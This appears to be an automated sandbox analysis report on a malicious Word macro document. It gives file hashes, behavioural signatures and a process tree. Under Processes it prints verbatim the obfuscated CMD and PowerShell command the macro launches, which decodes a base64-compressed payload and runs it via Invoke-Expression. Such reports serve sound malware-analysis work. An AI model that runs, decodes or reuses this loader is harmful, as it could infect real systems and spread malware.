Overview

overview

10

Static

static

8

e8a69d43cb...18.doc

windows7-x64

10

e8a69d43cb...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-09-2024 07:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc

  • Size

    84KB

  • MD5

    e8a69d43cb32354bd852c5ab9c071abe

  • SHA1

    11c101fc170253637726e5d1117a86dd2a2d9401

  • SHA256

    51cd6bdb18da6dc94549e067b04e727b9e947f2f189f5c27da67eb56f77c5f54

  • SHA512

    796c5403741abeacc76247f52a872d2b11aba408493a16263a10a99d9fff9111c8a9610dfbd9ece011dc60bd922a453259487d60bbf0e2a0f2f9b45ed08d2900

  • SSDEEP

    1536:c5ocn1kp59gxBK85fBt+a9AgIsTy4Ceh:B41k/W48jIt4CW

Score
10/10
discoveryexecution

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2508
      • C:\Windows\SysWOW64\CMD.exe
        CMD c:\wINdows\SYsTeM32\CmD.EXe /C "SeT OxnHJ= ^& ((GV '*MDr*').nAme[3,11,2]-joiN'') ( NEW-oBjEcT Io.sTReaMReadeR((NEW-oBjEcT Io.cOMPresSIon.dEFLaTESTreAm([iO.mEmoRYSTREam] [syStEm.conVeRt]::FroMBasE64StriNG( 'TZDBSsNAEIZfJYeFbYnZ1ApGugSKitCDFqzoxctmO+2m3czGzdBNW/LupkHF6/8N38z8bLeqcoSQuGIHmqIXIPEBxYMtAUmy3drm3BDVszQlCy15qEBoV6XON8vjaf7DDgoNeA8BtgZQFJAuflEIQWhVAZaNNknjNhSU7x0mPaJ9+zM0Zjq5zvpYoYZqT8OS9+0k+++hE+B0IKFOtEPqj0zv2lcuVrUtacTnfCyZL5+jPOLZzS2X7Gt5nzPAw4ygqmP+yeMLj7mAFrjcOA9KmxFDr6MSo8vD4zP545n1xYhHF9A6tX4qLQwzV9FFOJYLPLg9JIteOiSy6D172WlF2py77hs=' ),[Io.CoMpResSioN.ComPreSSIONMoDE]::DECompreSs)),[sYsTeM.tEXT.encODiNG]::ascii) ).rEADtoeNd( ) &&PoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) ^| ^& ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )"
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2068
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) | & ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2744

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      c842571d34c7f73c3e2e67ec2bc6eea9

      SHA1

      4ce33673aa57c34d5bc95fd32a7615c367697f08

      SHA256

      bfdf4bd71942eb5cca0a87c6d3b27050a3f256a70fac63aa4103482648025157

      SHA512

      8ebd12f162e486a257dfc5c79992eff708848336a59cc3dab9aa70e54ec75de7bd3e8b9a6cf48843a6f478f435cf78e36c150f5a0b8b44e36c2c2d294fc92f19

      Download Submit

    • memory/3000-0-0x000000002F801000-0x000000002F802000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3000-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3000-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB

      Download

    • memory/3000-4-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/3000-5-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/3000-6-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/3000-15-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB

      Download

    • memory/3000-16-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/3000-31-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3000-33-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/3000-32-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB

      Download